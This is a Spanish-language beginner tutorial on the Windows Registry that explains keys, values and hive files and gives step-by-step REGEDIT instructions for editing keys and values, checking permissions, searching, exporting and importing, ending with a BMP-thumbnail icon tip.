El Registro de Windows es como una gran base de datos donde todos los programas que tenemos en el ordenador (incluido el propio Windows) almacenan todas sus opciones de configuración. Desde Windows, que por ejemplo almacena la información sobre los dispositivos que tengamos (tarjetas de sonido, de video, etc) hasta programas, como por ejemplo WinZip, que guarda aquí los nombres de los últimos archivos que hemos abierto... ¡De todo!

Toda esta información se encuentra estructurada de una manera más o menos jerárquica, al estilo de la estructura de directorios y archivos de nuestro disco duro.



El Registro contiene 6 "carpetas" (a las que se llama Claves) principales. Dentro de cada clave, puede haber: Subclaves (como en el disco duro, donde puede haber una carpeta metida dentro de otra) y Valores (como si fueran los archivos del disco duro). Cada valor tiene un Nombre del valor y una Información del valor. Pongo un ejemplo (en rojo las Claves, en azul los Valores y en verde las Informaciones de los valores):

Registro
HKEY_CURRENT_USER (es una de las claves principales, contiene la configuración del usuario actual)
SOFTWARE (es la clave que contiene la configuración de los programas instalados en el ordenador)
WINZIP (la clave que contiene la configuración de WinZip)
Último archivo abierto (este es el Nombre del Valor) = C:\ARCHIVO.ZIP (esta es la información de este valor)

La ruta de acceso a este valor se escribirá así: HKEY_CURRENT_USER\Software\WinZip\Último archivo abierto=C:\ARCHIVO.ZIP



En Windows 95, 98 y ME, toda esta gran base de datos se guarda en nuestro disco duro en dos archivos: SYSTEM.DAT y USER.DAT, que se encuentran dentro de la carpeta de Windows. El primero guarda la parte del Registro que contiene la información sobre el hardware del ordenador y del software común a todos los usuarios, configuración general de Windows...; esta parte se cargará siempre al iniciar Windows.

El segundo archivo contiene la información de la configuración personal de Windows y de los programas para los usuarios que tenga el ordenador: existe un USER.DAT diferente para cada uno de los usuarios que hayamos definido en Windows. Si hay más de un usuario, cada USER.DAT se guardará en la carpeta de cada usuario dentro de Windows\Profiles\, en vez de hacerlo en la propia carpeta Windows. Así, por ejemplo: cuando yo inicie sesión en Windows con mi nombre (Windows carga MI USER.DAT), al utilizar WinZip, éste me mostrará los últimos archivos que YO he abierto. Cuando venga mi hermano e inice sesión con su nombre (Windows cargará ahora SU USER.DAT), WinZip le mostrará los últimos archivos que haya abierto ÉL, pero no los que haya abierto YO.



En Windows 2000, XP y 2003, el Registro se guarda en el disco duro en varios archivos (en el caso de estos sistemas, llamados Hives), cada uno de los cuales contiene una sección distinta del Registro. La mayoría de los Hives se guardan en la carpeta Windows\System32\Config y son SAM, SECURITY, SOFTWARE, SYSTEM y DEFAULT. Dichos archivos almacenan la parte del Registro que contiene la información sobre el hardware del ordenador, el software común a todos los usuarios, los datos de seguridad de las cuentas de usuario... Estos Hives están permanentemente disponibles desde el inicio de Windows.

También hay Hives que guardan la configuración personal de cada cuenta de usuario del ordenador. Estas secciones del Registro se guardan en los archivos NTUSER.DAT que se encuentran en las carpetas propias de cada usuario (normalmente Documents and Settings\nombre_usuario). Estas secciones están disponibles cuando los usuarios correspondientes han iniciado sesión.

Además, en Windows 2000, XP y 2003, cada clave del Registro dispone de Permisos. Los permisos controlan qué usuarios pueden acceder o modificar el contenido de la clave y las subclaves. Por ejemplo, desde una cuenta de usuario limitado se puede acceder a las claves de HKEY_LOCAL_MACHINE\SOFTWARE pero no se puede modificar ninguna clave ni valor.



Para que el usuario de Windows pueda editar por sí mismo la información contenida en el Registro, existe la herramienta "Editor del Registro" o "REGystry EDITor" (REGEDIT). Para abrir este programa, bastará con ir al Menú Inicio, coger la opción Ejecutar, teclear REGEDIT.EXE y pulsar Aceptar.

El Editor del Registro nos presenta una ventana dividida en dos partes:
- La parte izquierda muestra un árbol con las Claves que contiene el Registro (nada más abrir REGEDIT, veremos sólo las 6 claves principales)
- La parte derecha muesta los Valores que contiene la clave que tengamos seleccionada en la parte izquierda.

Ejemplo práctico: hagamos doble clic sobre la Clave HKEY_CURRENT_USER: hemos abierto esa Clave del Registro y podemos ver en la parte izquierda todas las subclaves que contiene. Observamos que esta clave no contiene ningún valor (normalmente). Ahora hacemos clic sobre RemoteAccess: podemos ver en la parte derecha los valores que contiene esta clave (en este caso son datos sobre la conexión de Internet por Acceso Telefónico a Redes); observemos que haciendo un clic sólo, no se expanden en la parte izquierda todas las subclaves de RemoteAccess.

El Editor del Registro funciona de forma muy parecida al Explorador de archivos de Windows. Investigue un poco a su aire por el Registro (¡Ojo!: sin modificar nada) hasta que se maneje bien.



Ahora vamos a ver como crear, modificar o eliminar Claves dentro del Registro:

Para hacer esta práctica de manera segura para el sistema (aunque se equivocara, escribiera algo mal o luego no borrara estas claves de ejemplo no hay ningún peligro) diríjase a la clave HKEY_CURRENT_USER\Software\ : haga doble clic sobre la clave HKEY_CURRENT_USER y seguidamente sobre la clave SOFTWARE; se expandirán todas las claves que contiene SOFTWARE, (aquí encontrará la configuración de los programas que tenga instalados, normalmente agrupados por sus empresas)

- Crear una clave nueva:
- 1 - Seleccione la clave dentro de la cual quiere crear la clave nueva haciendo un clic sobre ella: en este caso SOFTWARE. Ahora estará resaltada en azul.
- 2 - Vaya al menú Edición -> Nuevo -> Clave. Aparece una clave nueva dentro de la que estaba seleccionada.
- 3 - Dele un nombre a su nueva clave (por ejemplo teclee: Prueba) y pulse Intro.

- Modificar una clave (cambiarle el nombre):
- 1 - Seleccione la clave a la que quiere cambiar el nombre haciendo un clic sobre ella: para seguir el ejemplo, sobre Prueba.
- 2 - Vaya al menú Edición -> Cambiar Nombre.
- 3 - Teclee el nuevo nombre que tendrá su clave (por ejemplo: Clave de Prueba) y pulse Intro.

- Eliminar un clave:
- 1 - Seleccione la clave que quiera eliminar haciendo un clic sobre ella: Clave de Prueba.
- 2 - Vaya al menú Edición -> Eliminar. Aparece una ventana de confirmación que le pregunta si está seguro de querer borrar la clave y todo su contenido (en este caso no contiene nada).
- 3 - Pulse el botón Sí.



A continuación vemos como crear, modificar o eliminar valores dentro de una clave. Para comenzar, vuelva a crear la Clave de Prueba que hemos utilizado en el ejemplo anterior para utilizarla en esta ocasión para crear valores en ella:

- Crear un valor:
- 1 - Seleccione la clave dentro de la cual quiera crear un valor haciendo un clic sobre ella: quedará resaltada en azul.
- 2 - Utilice la opción del menú Edición -> Valor; hay varios tipos de valores que puede crear, utilice el que quiera:
- Valor de cadena: la información de este valor será una simple cadena de texto.
- Valor binario: la información de este valor será un número binario.
- Valor DWORD: la información de este valor será un número no binario (hexadecimal o decimal).
* En Windows 2000, XP y 2003 existen más tipos de valores, pero su uso es menos habitual y por mantener la simplicidad de este tutorial no parece necesario tratarlos.
- 3 - Dele un nombre al nuevo valor (por ejemplo: Valor de Prueba) y pulse Intro (Verá que el nuevo valor aún no contiene Información)

- Introducir o editar la Información de un valor:
- 1 - Haga doble clic sobre el valor del que quiera modificar su información (en el ejemplo: Valor de Prueba). Se abrirá una ventana que le permitirá introducir o modificar la Información del Valor.
- 2 - En el campo Información del valor teclee el texto (si se trata de una valor de cadena) o el número (si es un valor binario o un valor DWORD) que prefiera.
- 3 - Pulse Aceptar. Ahora la nueva información aparecerá asociada al valor.

- Modificar el Nombre de un valor:
- 1 - Seleccione el valor al que quiera cambiar el nombre haciendo un clic sobre él: en el ejemplo, sobre Valor de Prueba.
- 2 - Vaya al menú Edición -> Cambiar Nombre.
- 3 - Teclee el nuevo nombre del valor y pulse Intro.

- Eliminar un valor:
- 1 - Seleccione el valor que quiera eliminar haciendo un clic sobre él: escoja el Valor de Prueba.
- 2 - Vaya al menú Edición -> Eliminar. Aparece una ventana de confirmación que le pregunta si está seguro de querer borrar el valor seleccionado.
- 3 - Pulse el botón Sí.



Si estamos utilizando Windows 2000, XP y 2003 también debemos saber cómo consultar los permisos que tiene asignados una clave y cómo modificarlos (sólo si hemos iniciado sesión con una cuenta con privilegios de Administrador). Vamos a usar de nuevo la Clave de Prueba que habíamos utilizado en los ejemplos anteriores para mostrar y modificar sus permisos:

- Mostrar (y modificar) los permisos de una clave:
- 1 - Seleccione la clave de la cual quiera mostrar los permisos haciendo un clic sobre ella: quedará resaltada en azul.
- 2 - Haga clic sobre la misma clave con el botón derecho del ratón y escoja la opción del menú Permisos.... Habitualmente una clave tiene dos tipos de permisos:
- Lectura: permite al usuario acceder a la clave y ver los valores e información de los valores que contiene.
- Control total: permite al usuario crear, modificar o eliminar valores, así como modificar o eliminar la propia clave. Activar este permiso implica la activación del permiso Lectura.
- 3 - Si queremos asignar cualquiera de los dos permisos, únicamente es necesario activar (para permitir) o desactivar (para negar) la casilla correspondiente a cada permiso.
- 4 - Pulse Aceptar. Si ha modificado los permisos, ahora ya son efectivos.

· ¡Aviso!: Salvo que tenga una buena razón para cambiar los permisos de una clave y sepa cuales pueden ser las consecuencias, por lo general NO es conveniente cambiar los permisos que tienen las claves. Por ejemplo, dar Control total a una clave en la que antes una cuenta de usuario limitado no tenía este permiso puede suponer un riesgo para la seguridad del equipo al permitir cambios no autorizados.



Si ha estado curioseando por el Registro habrá observado lo grande que es. (En especial la clave principal HKEY_CLASSES_ROOT)

Cuando necesitemos buscar un clave, un valor o lainformación de un valor, deberemos utilizar la opcion del menú Edición -> Buscar . Esta opción nos presentará una ventana en la que podemos teclear aquella palabra o número que queramos buscar, y especificar si estamos buscando una clave, un valor o una información.

Como ejemplo teclee su propio nombre (es curioso ver cuantísimas veces aparece en muchos sitios). Cuando se encuentre una clave, valor y/o información de valor (según haya seleccionado en la ventana Buscar), la búsqueda se detendrá y resaltará el lugar donde aparezca su nombre. Ahora puede trabajar con esa clave, valor o información como ha visto antes. Si quiere seguir buscando en el resto del Registro, pulse F3.



Otra función que tiene REGEDIT es la posibilidad de copiar a un archivo .REG (exportar) todo o una parte del Registro (que puede utilizarse por ejemplo como copia de seguridad) o de copiar al Registro (importar) el contenido de uno de esos archivos .REG (para restaurar la copia de seguridad).

- Exportar:
- Si solo queremos exportar una parte del Registro, seleccionaremos antes de nada la clave a exportar. Por ejemplo HKEY_CURRENT_USER
- Escogemos la opcion del menú Registro -> Exportar archivo de Registro. Aparecerá una de las típicas ventanas de guardar archivo de Windows. Tecleamos el nombre que tendrá el archivo .REG y eligimos si queremos exportar Todo el Registro o sólo la parte seleccionada. Finalmente pulsamos Guardar

- Importar:
- Nos dirigimos a la opción del menú Registro -> Importar archivo de Registro. Es otra de las típicas ventanas de abrir archivo de Windows. Tan sólo tecleamos el nombre o seleccionamos el archivo .REG que queremos importar y pulsamos Abrir.
· ¡Aviso! Si el Registro ya contiene las claves o valores que haya en el archivo .REG, estas serán sobreescritas al importar el contenido del .REG al Registro.



El Editor del Registro cuenta también con un archivo de ayuda, como todo programa que se precie, que aunque no contiene información demasiado detallada sobre el Registro, si explica paso a paso cómo realizar varias operaciones sobre el mismo como las que he explicado arriba.

Esta ayuda es accesible en el menú Ayuda dentro del Editor del Registro.



Como curiosidad, ya para acabar, propongo probar el siguiente "truco" (quizá ya muy conocido, pero...). Con él haremos que los archivos BMP, en vez de mostrar el icono de Paint, muestren como icono una miniatura de su contenido. Así podrá verlos o buscar uno de ellos sin necesidad de abrirlos:
- Acceda al Editor del Registro de Windows (ejecutar REGEDIT.EXE).
- Diríjase a la clave HKEY_CLASSES_ROOT\Paint.Picture
- Compruebe si existe una subclave de Paint.Picture llamada DefaultIcon (si no existe, créela usted mismo).
- La información del valor Predeterminado de esta clave será ahora MSPAINT,1 (si no existe, modifique el contenido de este valor).
- Debe crear/modificar esta información y escribir como nueva informacion del valor %1